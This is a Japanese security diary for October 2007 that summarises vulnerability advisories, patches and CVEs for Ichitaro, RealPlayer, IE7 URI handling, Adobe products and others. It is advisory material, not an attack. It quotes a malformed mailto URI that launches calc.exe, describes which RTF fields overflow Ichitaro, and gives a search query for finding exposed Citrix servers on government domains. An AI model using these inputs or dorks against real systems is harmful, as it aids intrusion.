セキュリティホール memo - 2007.10

Last modified: Mon Jun 2 18:10:55 2008 +0900 (JST)


 このページの情報を利用される前に、注意書きをお読みください。


2007.10.31

追記

Windows Media Player プラグインの脆弱性により、リモートでコードが実行される (911564) (MS06-006)

 KB911564 日本語版 にも、上記と同様の内容が追加された模様。

Microsoft Windows Sever 2003 Service Pack 2 を実行しているコンピュータにセキュリティ更新プログラム MS06-006 を展開すると、問題が発生することがあります。コンピュータにマイクロソフト以外のインターネット ブラウザ用の Microsoft Windows Media Player プラグインがインストールされていると、Windows Update、Windows Server Update Services、Systems Management Server、および Microsoft Baseline Security Analyzer の検出ロジックでセキュリティ更新プログラム MS06-006 が提供されません。セキュリティ更新プログラム MS06-006 を手動でインストールすることはできます。
Windows Updateをこっそり更新? 「マルウェア」呼ばわりにMSが釈明

 Windows Updateで発生している不具合,Microsoftが初めてミスを認める (日経 IT Pro, 2007.10.30)。Windows IT Pro の翻訳記事。

JVN#50495547 / JVN#32981509 / JVN#29211062: 「一太郎シリーズ」における3つのバッファオーバーフローの脆弱性

 一太郎plug-inをIEとFirefoxで無効に 〜 ジャストシステムは本当の脅威を教えてくれない (高木浩光@自宅の日記, 2007.10.30)。 個人的には、ジャストシステムはもはや単なるアプリケーションベンダーではなく、アンチウイルスソフトを扱うセキュリティベンダーとなったにもかかわらず、こういう態度だという点が一番の問題だと思う。

 手元の Windows XP / IE 7 / Firefox 2 には一太郎 2005 が入っていて、念のため JS文書ビューア ActiveXプラグイン (ジャストシステム) もインストールしてみたのだけど、 プラグインがまともに動作していないようなのだよなあ。うーん。喜んでいいのやら悲しむべきなのやら。

 ……さきほど「ジャストシステム ユーザーズ・インフォメーション」 が流れてきた。

Date: Wed, 31 Oct 2007 13:57:04 +0900
To: users-information@justsystem.co.jp
From: Justsystem <users@justsystem.co.jp>
Subject: UsersInfo【一太郎の「セキュリティ更新モジュール」公開のお知らせ】10/31
(中略)
────────────────────────────────────
       ▼一太郎 のセキュリティ更新モジュール▼
    http://www.justsystems.com/jp/info/pd7004.html?m=jui31c01
────────────────────────────────────

 【想定される悪影響】
 …………………………………………………………………………………………
 悪意のある第三者に不正に改ざんされた一太郎文書を読み込むことによって、
 任意のコードが実行され、パソコンが不正に操作される危険性があります。

 悪意の攻撃者はそのようなファイルを電子メールの添付ファイルにして
 送りつけたり、WEBサイトに置くことで攻撃を仕掛けます。
 そしてお客様がそのようなファイルを開いたり、リンクをクリックしたり
 することで意図せず不正な一太郎文書を読み込み、
 悪意の攻撃を実行させてしまう恐れがあります。
 …………………………………………………………………………………………
(後略)

 一太郎の脆弱性を悪用した不正なプログラムの実行危険性について (ジャストシステム) も改訂されており、一太郎 2004 / 13 / 12 / 11 についても修正プログラムが用意されている。

いろいろ (2007.10.31)
(various)


2007.10.30

いろいろ (2007.10.30)
(various)

2007.11.09 追記:

 SonicStage Ver.4.0以降をご使用のお客様へ重要なお知らせ (SONY, 2007.11.06)。CONNECT Player の件と思われ。

2007.12.04 追記:

 SonicStage の件、修正プログラムが公開されました: SonicStage CP(SonicStage Ver.4.0/4.1/4.2/4.3) セキュリティ脆弱性対策アップデートプログラムご提供のお知らせ (SONY)。 匿名希望さん情報ありがとうございます。

 関連: JVN#66291445 - SonicStage CP におけるバッファオーバーフローの脆弱性

追記

Double Whammy! Another Sony Case (And it's Not BioShock) (SONY ポケットビットねた)

 再インストール用ソフトウェア一式が公開されています。

Windows Updateをこっそり更新? 「マルウェア」呼ばわりにMSが釈明

 いいわけ: 「メンテに煩わされたくない人向け」、OneCareの設定変更問題でMSが釈明 (ITmedia, 2007.10.29)

RealNetworks, Inc.、セキュリティ脆弱性に対応するアップデートをリリース
(RealNetworks, 2007.10.25)

 RealPlayer 10.5 以前、Mac 用 RealPlayer 10.1 以前、Linux 用 RealPlayer 10.0.8 以前、Helix Player 10.0.8 以前に複数の欠陥。攻略 mp3 / rm / SMIL / swf / ram / pls ファイルによって任意のコードが実行される。 CVE-2007-5080 CVE-2007-5081 CVE-2007-3410 CVE-2007-2263 CVE-2007-2264 CVE-2007-4599

 RealPlayer 11 / 10.5 (6.0.12.1662)、 Mac 用 RealPlayer 10.0.0.503、Linux 用 RealPlayer 10.0.9、Helix Player 10.0.9 で修正されている。なお、今 RealPlayer 10.5 をダウンロードしたり、RealPlayer を起動して「アップデートをチェック」したりすると 6.0.12.1665 になるようだ。

2007.12.25 追記:

 この欠陥を攻略する Web ページが登場しているようです。

 なお、さきほど RealPlayer 11 にアップグレードしてみたら、ビルド番号は 6.0.14.748 でした。


2007.10.29

[SECURITY] Fedora Core 6 Update: openssh-4.3p2-25.fc6
(RedHat, 2007.10.15)

 Fedora Core 6 の openssh パッケージに欠陥。Fedora Core 6 での独自拡張部分 (openssh-4.3p1-audit.patch) に欠陥があり、細工したユーザ名を用いて audit log に任意の文字列を挿入できる。 CVE-2007-3102

 openssh-4.3p2-25.fc6 で修正されている。同じ問題は RHEL / CentOS 5 の openssh パッケージにもあるような気が。

2007.11.09 追記:

 RHEL 5 fix 出ました: RHSA-2007:0540-3 - Moderate: openssh security and bug fix update

いろいろ (2007.10.29)
(various)

追記

JVN#50495547 / JVN#32981509 / JVN#29211062: 「一太郎シリーズ」における3つのバッファオーバーフローの脆弱性

 関連:

 いずれもリッチテキストファイルの処理における buffer overflow 欠陥。

  • {\header \pard} フィールドにおいて、pard を長い文字列を指定すると buffer overflow
  • fcharset0 フィールドに長いフォント名を指定すると buffer overflow
  • {\info{\title フィールドに長いタイトル名を指定すると buffer overflow
RealPlayer Exploit On The Loose

 上記 patch では、MPAMedia.dll の欠陥も修正されていた模様:


2007.10.28

はてなのCAPTCHAは簡単に破れる
(凪瀬 Blog, 2007.10.26)

 0-day ですか。世の中キビシイ。

以上ではてなのCAPTCHAを破ることができたわけですが、ポイントは以下の4つ。

追記

特定のインテルプロセッサを搭載するデスクトップ製品のシステムBIOSをアップデートしてください(改版)

 Microsoft からも microcode reliability update が出ていました。

0day: PDF pwns Windows

 関連:

  • PDFファイルアタックの日本上陸を確認 (トレンドマイクロ セキュリティ blog, 2007.10.27)。手元にも来ていた。 FTP サーバは今でも生きてますね。 EPSV を使わないようにしないと get できないけど。

     現在、PDFファイルアタックにて確認されているメール件名は次の通りです。

    • Balance Report
    • Credit report
    • Personal Balance Report
    • Personal Credit report
    • Personal Financial Statement
    • tax statement
    • Your Credit points
    • Your Credit report
    • Your Credit File

    手元に来たメールには Subject: はなかった。


2007.10.27

追記

初音ミクでグーグル八分?

 ヤフー「画像の収集が遅れた」 初音ミク問題でコメント (ITmedia, 2007.10.26)


2007.10.26

追記

0day: PDF pwns Windows

 関連:

Windows Updateをこっそり更新? 「マルウェア」呼ばわりにMSが釈明

 Windows Live OneCare を入れるとこっそり変えられてしまう事実が判明した模様。

アラート/アドバイザリ:ウイルス検索エンジン VSAPI 8.320.1004 および 8.500.1002 のフィルタドライバTmxpflt.sys におけるバッファオーバフローの脆弱性について

 関連:


2007.10.25

JVN#50495547 / JVN#32981509 / JVN#29211062: 「一太郎シリーズ」における3つのバッファオーバーフローの脆弱性
(IPA, 2007.10.25)

 一太郎 2007 / 2006 / 2005 / 文藝 / 2004 / 13 / 12 / 11 / Lite2、一太郎 for Linux、一太郎ビューアに 3 種類の buffer overlow 欠陥が存在。 攻略一太郎文書を読み込むと任意のコードが実行される。発見者はいずれもフォティーンフォティ技術研究所の鵜飼さん。

 一太郎 2007 / 2006 / 2005 / 文藝 / Lite2、一太郎 for Linux、一太郎ビューアには修正プログラムが用意されている。一太郎の脆弱性を悪用した不正なプログラムの実行危険性について (ジャストシステム) からダウンロードして適用すればよい。 その他についてはもはやメンテナンスされていないため、まずはメンテナンスされているバージョンにアップグレードし、その後で修正プログラムを適用する。

2007.10.29 追記:

 関連:

 いずれもリッチテキストファイルの処理における buffer overflow 欠陥。

2007.10.31 追記:

 一太郎plug-inをIEとFirefoxで無効に 〜 ジャストシステムは本当の脅威を教えてくれない (高木浩光@自宅の日記, 2007.10.30)。 個人的には、ジャストシステムはもはや単なるアプリケーションベンダーではなく、アンチウイルスソフトを扱うセキュリティベンダーとなったにもかかわらず、こういう態度だという点が一番の問題だと思う。

 手元の Windows XP / IE 7 / Firefox 2 には一太郎 2005 が入っていて、念のため JS文書ビューア ActiveXプラグイン (ジャストシステム) もインストールしてみたのだけど、 プラグインがまともに動作していないようなのだよなあ。うーん。喜んでいいのやら悲しむべきなのやら。

 ……さきほど「ジャストシステム ユーザーズ・インフォメーション」 が流れてきた。

Date: Wed, 31 Oct 2007 13:57:04 +0900
To: users-information@justsystem.co.jp
From: Justsystem <users@justsystem.co.jp>
Subject: UsersInfo【一太郎の「セキュリティ更新モジュール」公開のお知らせ】10/31
(中略)
────────────────────────────────────
       ▼一太郎 のセキュリティ更新モジュール▼
    http://www.justsystems.com/jp/info/pd7004.html?m=jui31c01
────────────────────────────────────

 【想定される悪影響】
 …………………………………………………………………………………………
 悪意のある第三者に不正に改ざんされた一太郎文書を読み込むことによって、
 任意のコードが実行され、パソコンが不正に操作される危険性があります。

 悪意の攻撃者はそのようなファイルを電子メールの添付ファイルにして
 送りつけたり、WEBサイトに置くことで攻撃を仕掛けます。
 そしてお客様がそのようなファイルを開いたり、リンクをクリックしたり
 することで意図せず不正な一太郎文書を読み込み、
 悪意の攻撃を実行させてしまう恐れがあります。
 …………………………………………………………………………………………
(後略)

 一太郎の脆弱性を悪用した不正なプログラムの実行危険性について (ジャストシステム) も改訂されており、一太郎 2004 / 13 / 12 / 11 についても修正プログラムが用意されている。

いろいろ (2007.10.25)
(various)

(速報) L.root-servers.net の IP アドレス変更について
(JPRS, 2007.10.24)

 DNS のルートサーバの 1 つ、L ルートサーバの IPv4 アドレスが、198.32.64.12 から 199.7.83.42 に変更されるそうです。この変更は 2007.11.01 に行われます。 旧アドレスも、少なくとも 6 か月は維持されるそうです。2007.11.01 以降に、忘れずに対応しておきましょう。


2007.10.24

103112: Vulnerability in Java Runtime Environment Virtual Machine May Allow Untrusted Application or Applet to Elevate Privileges
(Sun, 2007.10.22)

 Sun Java JDK / SDK / JRE に欠陥。信頼されていないアプレットによる権限上昇が可能。local file の読み書きや local アプリの実行が可能となる。

 以下のバージョンで修正されている:

追記

0day: PDF pwns Windows

 さっそくウイルスが登場しているようです。

初音ミクでグーグル八分?

 現在の状況

  • Google: 若干表示されるようになってきたが、Microsoft Live Search と比べると大きく劣る
  • Yahoo! Japan: 表示されるようになってきたが、Microsoft Live Search と比べるとかなり劣る

 関連:


2007.10.23

Drupal 4.7.8 and 5.3 released: Security updates and bugfixes.
(drupal.org, 2007.10.17)

 Drupal 4.7.8 / 5.3 において、5 種類の欠陥が修正されているそうです。神戸さん情報ありがとうございます。

 この他に、drupal 用のモジュールの欠陥情報が公開されています。

 また、PHP の欠陥に関する情報が公開されています。

追記

Macrovision secdrv.sys Local Privilege Escalation

 関連:

Patch available for PageMaker buffer overflow vulnerability

 日本語版: APSB07-15: PageMakerにおけるバッファオーバーフローの脆弱性に対するパッチ (Adobe)

Illustrator CS3 update to address potential security vulnerabilities

 日本語版: APSB07-16: Illustrator CS3の潜在的な脆弱性に対処するためのアップデート公開 (Adobe)

GoLive 9 update to address potential security vulnerabilities

 日本語版: APSB07-17: GoLive 9の潜在的な脆弱性に対処するためのアップデート公開 (Adobe)

Web Page Code Injection via ARP Spoofing

 ARPスプーフィング:読者のWebホスティング・サービスは守られているか (日経 IT Pro, 2007.10.19)。 ARP Spoofing: Is Your Web Hosting Service Protected ? の翻訳記事。

0day: PDF pwns Windows

 Adobe Reader 8.x, Acrobat 8.x 用の修正プログラムが公開された。

 しかし Adobe Reader 7.x, Acrobat 7.x 用の修正プログラムはまだ公開されていない。関連:

初音ミクでグーグル八分?

 現在の状況

  • Google: あいかわらず表示されない
  • Yahoo! Japan: 表示されるようになってきた。しかし Microsoft Live Search よりはかなり劣る

 関連:


2007.10.22


2007.10.21


2007.10.20

(Currently unpatched) iPhone vulnerability with exploit
(SANS ISC, 2007.10.19)

 iPhone / iPod touch 1.1.1 に欠陥。 libtiff に欠陥があり、攻略 TIFF 画像を使って iPhone / iPod touch のルートパーティションの read/write 権限を取得できる。CVE-2007-5450。関連:

2007.11.13 追記:

 この件の修正と思われ: About the security content of iPhone v1.1.2 and iPod Touch v1.1.2 Updates (Apple)

追記

マイクロソフト セキュリティ情報の事前通知 - 2007 年 10 月

 MS07-060 を攻略する、Windows 用のウイルスが存在する模様:

RealPlayer Exploit On The Loose
(Symantec blog, 2007.10.19)

 Windows 版の RealPlayer 10.5 以前および 11 Beta に 0-day 欠陥。 ActiveX コントロール ierpplug.dll に buffer overflow する欠陥があり、 攻略 Web ページによって任意のコードを実行できる。既に攻略コードが野に放たれている。

 RealPlayer 10.5 および 11 Beta に適用できる patch が公開された: RealPlayer Security Vulnerability (Real.com)。 RealPlayer 10.0 以前については、一旦 10.5 以降にアップグレードし、その上で patch を適用する。patch は RealPlayer 自身のアップデート機能では適用できないので注意。関連:

2007.10.29 追記:

 上記 patch では、MPAMedia.dll の欠陥も修正されていた模様:


2007.10.19

追記

Citrixが軍や政府のWebサイトを無防備に——研究者が指摘

 関連:

マイクロソフト セキュリティ情報の事前通知 - 2007 年 8 月

 MS07-043 に関連する KB が: You experience application performance issues after you install the update from security bulletin MS07-043 on a computer that is running Windows Server 2003 or Windows XP Professional x64 Edition (Microsoft KB943172)。MS07-043 を適用した 64bit 版の Windows Server 2003 / XP において、Oleaut32.dll または Asycfilt.dll を使用するアプリケーションでパフォーマンスの問題が発生する模様。 該当するアプリケーション例は Microsoft SQL Server Analysis Services だそうで。 有償 patch があるそうです。

マイクロソフト セキュリティ アドバイザリ (943521) Windows Internet Explorer 7 がインストールされた Windows XP および Windows Server 2003 の URL の処理の脆弱性により、リモートでコードが実行される

 Opera, Firefox の更新が相次いで登場。いずれにも、この欠陥への対応が含まれている。

 関連:

JVN#71872818: AirStation WZR-RS-G54 および AirStation WZR-RS-G54HP におけるクロスサイトリクエストフォージェリの脆弱性

 WZR-RS-G54 / WZR-RS-G54HP に加え、WHR2-G54V と BHR-4RV にも CSRF 脆弱性があり、修正版ファームウェア Ver.2.49 が公開されている: WZR-RS-G54HP、WZR-RS-G54、WHR2-G54V、BHR-4RV製品における クロスサイトリクエストフォージェリの脆弱性についての、お知らせとお詫び (バッファロー, 2007.10.15)。 いずれも 2007.03.01 付で公開されていたのですね。

初音ミクでグーグル八分?

 Google の事例は、遅くとも 9/25 にはこの状況になっていた模様。

  • 本日の初音ミク (徒然日記, 2007.09.25)
    その4:初音ミクをぐぐってみた。 検索トップはクリプトンなのは至極当然で良いのですが画像を見ると (画像) が出てくるのは何故だ!!ちなみに多分デモンベインさんです。一文字もあってねぇじゃねぇか。

 また、JAN コード (4511820072413) で画像検索してもやっぱりひっかからない模様。

 あと、後発製品の VOCALOID2 SWEET ANN (クリプトン・フューチャー・メディア) はちゃんと Google 画像検索に出てくるという話があるそうで: #1236190 (slashdot.jp)。 やはり意図的に落としているとしか考えられない模様。

 関連:

Firefox 2.0.0.8 リリースノート
(mozilla-japan.org, 2007.10.19)

 Firefox 2.0.0.8 登場。8 種類の欠陥が修正されている他、Mac OS X 10.5 への対応 (ただし既知の問題あり) がなされている。 修正された欠陥のうち、MFSA2007-36: 不正に % エンコードされた URI が Windows によって誤って処理される は、マイクロソフト セキュリティ アドバイザリ (943521) Windows Internet Explorer 7 がインストールされた Windows XP および Windows Server 2003 の URL の処理の脆弱性により、リモートでコードが実行される の話だろう。

重要度: 危機的
重要度: 高
該当なし。
重要度: 中
重要度: 低

アラート/アドバイザリ:ウイルス検索エンジン VSAPI 8.320.1004 および 8.500.1002 のフィルタドライバTmxpflt.sys におけるバッファオーバフローの脆弱性について
(トレンドマイクロ, 2007.10.18)

 トレンドマイクロのウイルス検索エンジン VSAPI 8.320.1004, 8.500.1002 に付属するフィルタドライバ Tmxpflt.sys に buffer overflow する欠陥があり、local user がシステム権限で任意のコードを実行できる。 CVE-2007-4277

 ウイルス検索エンジン VSAPI 8.550-1001 で修正される。現在は Web ページ上でのみ公開されており、2007.10.24 に ActiveUpdate でも公開される。 VSAPI 8.550 は、リリースノートのページにはまだ掲載されていませんね……。

2007.10.26 追記:

 関連:

Macrovision secdrv.sys Local Privilege Escalation
(eEye research, 2007.10.16)

 Windows XP / Server 2003 に標準塔載されている Macrovision 製のデバイスドライバ secdrv.sys に欠陥があり、local user が Ring0 (カーネルレベル) 特権を取得できる。Windowsの未知の脆弱性突くエクスプロイトが出回る (ITmedia, 2007.10.18) の件と思われ。%WINDIR%\system32\drivers\secdrv.sys かな。 CVE-2007-5586

 patch はまだない。

2007.10.23 追記:

 関連:

2007.11.06 追記:

 関連:

2007.11.07 追記:

 patch 登場。

 関連:

2007.12.12 追記:

 MS07-067 - 重要  Macrovision ドライバの脆弱性により、ローカルで特権が昇格される (944653) でも修正された。


2007.10.18

初音ミクでグーグル八分?
(悪徳商法?マニアックス ココログ支店, 2007.10.18)

 ネタもと: 【圧力?】「初音ミク」でイメージ検索かけてもヒットせず。さらにwikipediaからも削除【TBS?】 (⊂⌒⊃。Д。)⊃カジ速≡≡≡⊂⌒つ゜Д゜)つFull Auto, 2007.10.18)。 Google や Yahoo! Japan の画像検索で「初音ミク」をぐぐってみると……。 いやはや、これはひどい。

18 :以下、名無しにかわりましてVIPがお送りします。 :2007/10/18(木) 01:30:15.72 ID:fJNe75DB0
釣りかと思ったらマジだwww
ちょっとこええ

 各自、実際に試してみよう。こういうときに (だけ) Microsoft Live Search の存在感が高まるのだよな……。関連:

 ウィキペディアについてはこちらを。

2007.10.19 追記:

 Google の事例は、遅くとも 9/25 にはこの状況になっていた模様。

 また、JAN コード (4511820072413) で画像検索してもやっぱりひっかからない模様。

 あと、後発製品の VOCALOID2 SWEET ANN (クリプトン・フューチャー・メディア) はちゃんと Google 画像検索に出てくるという話があるそうで: #1236190 (slashdot.jp)。 やはり意図的に落としているとしか考えられない模様。

 関連:

2007.10.23 追記:

 現在の状況

 関連:

2007.10.24 追記:

 現在の状況

 関連:

2007.10.27 追記:

 ヤフー「画像の収集が遅れた」 初音ミク問題でコメント (ITmedia, 2007.10.26)

Opera 9.24 登場
(Opera, 2007.10.18)

 Opera 9.24 登場。2 種類の欠陥が修正されている。

追記

いろいろ (2007.09.28)

 AIM の件、修正された模様: AIM新版、深刻な脆弱性に対処 危険性は残る (ITmedia, 2007.10.16)


2007.10.17

追記

マイクロソフト セキュリティ アドバイザリ (943521) Windows Internet Explorer 7 がインストールされた Windows XP および Windows Server 2003 の URL の処理の脆弱性により、リモートでコードが実行される

 関連:

Protecting Browsers from DNS Rebinding Attacks

 追加: Sun Java VM: CVE-2007-5375

Norton 360によりEFSの暗号化が施されたファイルが破壊される問題
(Narusaseの日記 -ハニポってどうよ?(仮)-, 2007.10.16)

 Norton 360 をお持ちの方、ぜひ追試を。

いろいろ (2007.10.17)
(various)

2007.12.09 追記:

 BrightStor ARCserve Backup Security Notice (CA) だが、 少なくとも CVE-2007-5327 が実は直っていなかった模様で、新しい patch が公開されている。 関連: [UPDATE] CA BrightStor ARCServe BackUp Message Engine Remote Stack Overflow Vulnerability (cocoruder)


2007.10.16

追記

マイクロソフト セキュリティ アドバイザリ (943521) Windows Internet Explorer 7 がインストールされた Windows XP および Windows Server 2003 の URL の処理の脆弱性により、リモートでコードが実行される

 3rd party patch だそうです: Third-party patch for CVE-2007-3896 (Internet Explorer 7 invalid URI handling) available

The patch consists of a ShellExecuteEx hook [2] that prevents the execution of malformed URLs and enforces normalization of valid URLs.

 あと、ISS の情報: 複数のベンダー製品での URI 処理によるコマンドの実行 (ISSKK, 2007.10.15)

いろいろ (2007.10.16)
(various)


2007.10.15


2007.10.14

Fortify Software Identifies and Protects Against New Class of Vulnerabilities — Cross-Build Injection — Tied To Open Source Software
(Fortify, 2007.10.09)

 ソースから実行コードをビルドする時に外部から悪意のあるコードを挿入する、という攻撃手法が存在し、Fortify ではそれを検出・防護できるようになった、という話。 それと、Java Open Review Project (fortifysoftware.com) というものがあるそうで。

 Common Weakness Enumeration (CWE) (mitre.org) というものがあるのですね。知らなかった……


2007.10.13

OpenSSL Security Advisory [12-Oct-2007]
(OpenSSL.org, 2007.10.12)

 OpenSSL に 2 つの欠陥。

 OpenSSL 0.9.8f / 0.9.7m で修正されている。また、OpenSSL 0.9.8f を使った DTLS クライアントは OpenSSL 0.9.8e 以前を使った DTLS サーバとは通信できない。 Changes between 0.9.8e and 0.9.8f [11 Oct 2007] を参照。

 戸井さん情報ありがとうございます。

追記

Web Page Code Injection via ARP Spoofing

 Nod to more ARP mayhem ? (McAfee blog, 2007.10.11)。NOD32 でおなじみ ESET の中国サイトもこれでヤラレたようで。


2007.10.12

2007年10月10日以降にダウンロードしたインターネットチャンネルは、どこが変わっているのですか?
(Wii サポート情報, 2007.10.10)

Operaブラウザのバージョン番号が、9.1から9.3になりました。
(中略)
Flash PlayerとJavaScriptに関する脆弱性に対策を施しました。

 Flash Player のバージョン番号はいくつになっているのだろう。

 関連: Wiiインターネットチャンネル・アドレス偽装のセキュリティ修正? (水無月ばけらのえび日記, 2007.10.12)

JVN#63304072: MouseoverDictionary において任意のスクリプトが実行される脆弱性
(JVN, 2007.10.12)

 Mouseover Dictionary に、任意のスクリプトが実行される欠陥があるという話。最新版 0.6.2 で対応されている。 CVE-2007-5459

JVN#71872818: AirStation WZR-RS-G54 および AirStation WZR-RS-G54HP におけるクロスサイトリクエストフォージェリの脆弱性
(JVN, 2007.10.12)

 バッファロー AirStation WZR-RS-G54 / WZR-RS-G54HP の管理 Web ページに CSRF 脆弱性があるという話。ファームウェア Ver.2.49 で対応されている。

2007.10.19 追記:

 WZR-RS-G54 / WZR-RS-G54HP に加え、WHR2-G54V と BHR-4RV にも CSRF 脆弱性があり、修正版ファームウェア Ver.2.49 が公開されている: WZR-RS-G54HP、WZR-RS-G54、WHR2-G54V、BHR-4RV製品における クロスサイトリクエストフォージェリの脆弱性についての、お知らせとお詫び (バッファロー, 2007.10.15)。 いずれも 2007.03.01 付で公開されていたのですね。


2007.10.11

マイクロソフト セキュリティ アドバイザリ (943521) Windows Internet Explorer 7 がインストールされた Windows XP および Windows Server 2003 の URL の処理の脆弱性により、リモートでコードが実行される
(Microsoft, 2007.10.11)

 「gnucitizen の Petko Petkov 氏」の名前も挙がってるし、0day: PDF pwns Windows の話と関係あるのかなあ。CVE-2007-3896

何が原因で起こりますか?
この脅威は Windows が Windows に渡された特別な細工がされた URL または URI を正しく処理しない場合に発生します。Internet Explorer 7 は Windows のコンポーネントを更新します。これは URL および URI が処理される時、Internet Explorer と Windows シェル間の対話を変更します。有効でない URI または URL を Windows に渡すアプリケーションにより、この脆弱性が悪用される可能性があります。

 意味がわからないので英文を読んでみる。

What causes this threat?
The threat presents itself when Windows does not correctly handle specially crafted URLs or URIs that are passed to it. Internet Explorer 7 updates a Windows component, which modifies the interaction between Internet Explorer and Windows Shell when handling URLs and URI's. Applications which pass un-validated URIs or URLs to Windows can be leveraged to exploit this vulnerability.

 こんな感じかなあ。

この脅威の原因は?
この脅威は、特別に細工された URL や URI が Windows に渡され、かつ正しく処理されない場合に発現します。Internet Explorer 7 をインストールすると Windows コンポーネントが更新され、URL や URI を処理する際の Internet Explorer と Windows Shell との間のやりとりが変更されます。正しいと保障されていない URL や URI を Windows に送るアプリケーションは、この脆弱性を攻略するために利用される可能性があります。

 「URL や URI を処理する際の Internet Explorer と Windows Shell との間のやりとりが変更され」るのだけど、その部分がだめだめ、ということなんですかねえ。

 Additional Details and Background on Security Advisory 943521 (MSRC Blog, 2007.10.10) に解説が。

In late July, another issue was discussed publicly using mailto: and 3rd party applications. This is the vulnerability discussed in the Advisory released today and it is a vulnerability in the way Windows handles URIs. This is not a vulnerability in any specific protocol handler, even though the mailto: protocol handler is used in our example. The examples we have seen involved the mailto: protocol handler being asked to handle URIs containing a % (percent sign). An example of this would be test%../../../../windows/system32/calc.exe”.cmd, which is clearly not a valid email address. When a user clicks a link to a URI, the application showing that link to users decides how it is supposed to be handled. For traditionally “safe” protocols like mailto: or http: applications often just verify the prefix and then choose to call into the Windows shell32 function ShellExecute() to handle it. This has been the case for a number of years. Windows then launches Internet Explorer passing the URI or launches the preferred email client passing the email address, etc. With IE6 installed, ShellExecute() passes the URI to IE which accepts it and inside IE determines it to be invalid. Navigation then fails harmlessly. With Internet Explorer 7 installed, the flow is a bit different. IE7 began to do more validation up front to reject malformed URI's. When this malformed URI with a % was rejected by IE7, ShellExecute() tries to “fix up” the URI to be usable. During this process, the URI is not safely handled. IE7 rejects the URI, and on Windows Vista ShellExecute() gracefully rejects the URI. That’s not the case on the older versions of Windows like Windows XP and Windows Server 2003 when IE7 is installed.

 関連かな: URI handling woes in Acrobat Reader, Netscape, Miranda, Skype 以下のスレッド。

2007.10.16 追記:

 3rd party patch だそうです: Third-party patch for CVE-2007-3896 (Internet Explorer 7 invalid URI handling) available

The patch consists of a ShellExecuteEx hook [2] that prevents the execution of malformed URLs and enforces normalization of valid URLs.

 あと、ISS の情報: 複数のベンダー製品での URI 処理によるコマンドの実行 (ISSKK, 2007.10.15)

2007.10.17 追記:

 関連:

2007.10.19 追記:

 Opera, Firefox の更新が相次いで登場。いずれにも、この欠陥への対応が含まれている模様。

 関連:

2007.11.14 追記:

 MS07-061 Windows URI 処理の脆弱性により、リモートでコードが実行される (943460) (Microsoft) で修正されている。

追記

Windows Media Player プラグインの脆弱性により、リモートでコードが実行される (911564) (MS06-006)

 KB911564 にこんな記述が追加された模様:

You may experience issues when you deploy security update MS06-006 on a computer that is running Microsoft Windows Sever 2003 Service Pack 2. Windows Update, Windows Server Update Services, Systems Management Server, and Microsoft Baseline Security Analyzer detection logic do not offer security update MS06-006 if the Microsoft Windows Media Player plug-in for a non-Microsoft Internet browser is installed on the computer. You can install security update MS06-006 manually.

 Windows Server 2003 SP2 において、Windows Update / WSUS / SMS / MBSA が MS06-006 を (インストール済なのに) 検出しない場合は、MS06-006 を手動でインストールすればいいみたい。

マイクロソフト セキュリティ情報の事前通知 - 2007 年 10 月

 MS07-060 - 緊急: Microsoft Word の脆弱性により、リモートでコードが実行される (942695) の、Office 2004 for Mac 用の exploit が存在する模様:

Kaspersky Web Scanner ActiveX Format String Vulnerability
(iDefense, 2007.10.10)

 Kaspersky Online Virus Scanner (日本語版) に欠陥。 インストールされる ActiveX コントロール (バージョン 5.0.93.1 以前) に format バグがあり、攻略 web ページにアクセスさせると任意のコードを実行できる。 CVE-2007-3675

 バージョン 5.0.98.0 以降で修正されている。Kaspersky Online Virus Scanner を利用したことがある場合は、 http://www.kaspersky.com/kos/eng/partner/default/kavwebscan.html にアクセスして最新バージョンに更新すればよい。関連:

2007.11.01 追記:

 関連: カスペルスキーオンラインスキャナ サービス再開のお知らせ (just-kaspersky.jp, 2007.10.18)。アップデート手順も解説されている。


2007.10.10

Citrixが軍や政府のWebサイトを無防備に——研究者が指摘
(ITmedia, 2007.10.10)

 CITRIX: Owning the Legitimate Backdoor (GNUCITIZEN, 2007.10.04) の話。さあ、君も今すぐぐぐってみよう!

その中には、政府ドメインのインスタンスが10件、軍ドメインが4件含まれていたという。

 ぐぐるときに「ext:ica site:.gov」のようにすれば ok です。

2007.10.19 追記:

 関連:

Patch available for PageMaker buffer overflow vulnerability
(Adobe, 2007.10.09)

 PageMaker 7.0.1 / 7.0.2 に欠陥。PageMaker (PMD) ファイルの処理に欠陥があり、長大なフォント名を含む PMD ファイルによって任意のコードを実行できる。 CVE-2007-5169

 patch があるので適用すればよい。関連:

2007.10.23 追記:

 日本語版: APSB07-15: PageMakerにおけるバッファオーバーフローの脆弱性に対するパッチ (Adobe)

Illustrator CS3 update to address potential security vulnerabilities
(Adobe, 2007.10.09)

 Illustrator CS3 に欠陥。攻略 BMP / DIB / RLE / PNG ファイルを Illustrator CS3 で開くと任意のコードを実行される。CVE-2007-2244 CVE-2007-2365

 patch が用意されているので適用すればよい。

2007.10.23 追記:

 日本語版: APSB07-16: Illustrator CS3の潜在的な脆弱性に対処するためのアップデート公開 (Adobe)

GoLive 9 update to address potential security vulnerabilities
(Adobe, 2007.10.09)

 GoLive 9 に欠陥。GoLive ドキュメントに攻略 BMP / DIB / RLE / PNG ファイルを挿入すると任意のコードを実行される。CVE-2007-2244 CVE-2007-2365

 patch が用意されているので適用すればよい。

2007.10.23 追記:

 日本語版: APSB07-17: GoLive 9の潜在的な脆弱性に対処するためのアップデート公開 (Adobe)

USBフラッシュメモリ 不具合のお知らせとお詫び
(buffalo, 2007.10.10)

 バッファローの USB メモリ (指紋認証モデル) RUF2-FSシリーズの一部にウイルス (オンラインゲームアカウント狙いのトロイの木馬) が添付されている模様。

型番            製造コード      シリアル番号
-----------------------------------------------------
RUF2-FS512-W 	07/09/11 	000001〜000360の一部
RUF2-FS1G-W 	07/09/11 	000001〜000360の一部
RUF2-FS2G-W 	07/09/11 	000001〜000120の一部

 こんなことが書かれている。

※当製造コードとシリアル番号が、共に該当しても、以下3-(2)でご案内しているウィルスチェックツールにより、ウィルスが検出されない場合は、製品を交換する必要がありません。安心してご利用ください。

 バッファローは、どのシリアル番号がウイルスつきなのかを正確には把握できていないようだ。RUF2-FSシリーズ ウィルスチェックプログラムで検査しないとだめみたい。

 関連: バッファローのUSBメモリーにウイルス混入、186個を無償交換 (日経 IT Pro, 2007.10.10)

「該当製品は860個だが、現時点で市場に流通しているのは186個」(バッファロー広報)という。

 ふむん。

